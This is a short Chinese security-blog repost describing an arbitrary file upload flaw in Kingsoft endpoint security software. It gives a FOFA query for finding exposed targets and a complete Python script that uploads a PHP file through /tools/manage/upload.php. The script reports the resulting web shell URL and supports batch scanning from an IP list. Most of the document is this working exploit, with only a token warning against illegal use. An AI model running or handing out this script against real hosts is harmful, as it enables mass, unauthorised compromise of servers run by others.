HW期间,为防范钓鱼,即日起FreeBuf将取消投稿文章的一切外部链接。给您带来的不便,敬请谅解~
fofa网址:fofa.so
fofa搜索:title=”金山终端安全”
随便点开一个,端口6868
poc验证存在漏洞,上传成功
python脚本:
import requests headers = { "Content-Type":"multipart/form-data;boundary=----WebKitFormBoundaryhQcaKJIKAnejKGru" } payload = '''------WebKitFormBoundaryhQcaKJIKAnejKGru Content-Disposition: form-data; name="file";filename="21232f297a57a5a743894a0e4a801f13.php" Content-Type: image/png <?php phpinfo();?> ------WebKitFormBoundaryhQcaKJIKAnejKGru--''' def multi(): f = open("ips.txt", "r") path = "/tools/manage/upload.php" for ip in f.readlines(): ip = ip.replace("\n", "") url = "http://{}{}".format(ip, path) f_exist = open("存在漏洞.txt", "a+") # print(url) try: res = requests.post(url=url, data=payload, headers=headers) # print(res.text) if res.text.find("File is valid, and was successfully uploaded") != -1: # print("upload success") file = "http://{}/Uploaddir/21232f297a57a5a743894a0e4a801f13.php".format(ip) print(file) f_exist.writelines(file) f_exist.writelines("\n") else: print("不存在此漏洞") f_exist.close() except Exception as e: print("请求异常-------", e.args) def single(): f_exist = open("存在漏洞.txt", "w+") path = "/tools/manage/upload.php" ip = input("目标ip = ") ip = ip.replace(" ","") url = "http://{}{}".format(ip, path) # print(url) try: res = requests.post(url=url, data=payload, headers=headers) # print(res.text) if res.text.find("File is valid, and was successfully uploaded") != -1: # print("upload success") file = "存在漏洞,shell:http://{}/Uploaddir/21232f297a57a5a743894a0e4a801f13.php".format(ip) print(file) f_exist.writelines(file) f_exist.writelines("\n") else: print("不存在此漏洞") f_exist.close() except Exception as e: print("请求异常-------",e.args) if __name__ == '__main__': info = ''' **************************************** **************************************** **************************************** ***请输入对应数字: *** ***1.针对单个url验证 *** ***2.批量文本验证(ips.txt 每行eg:ip:port) **************************************** **************************************** **************************************** ''' select = input(info) info.replace(" ","") if 1==int(select): while(1): single() elif 2==int(select): multi() else: print("选项异常 ",select)
支持单个IP验证,支持批量扫描:
请勿用于非法用途。。。。
来源:freebuf.com 2021-04-10 09:15:50 by: 阿刁123456
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册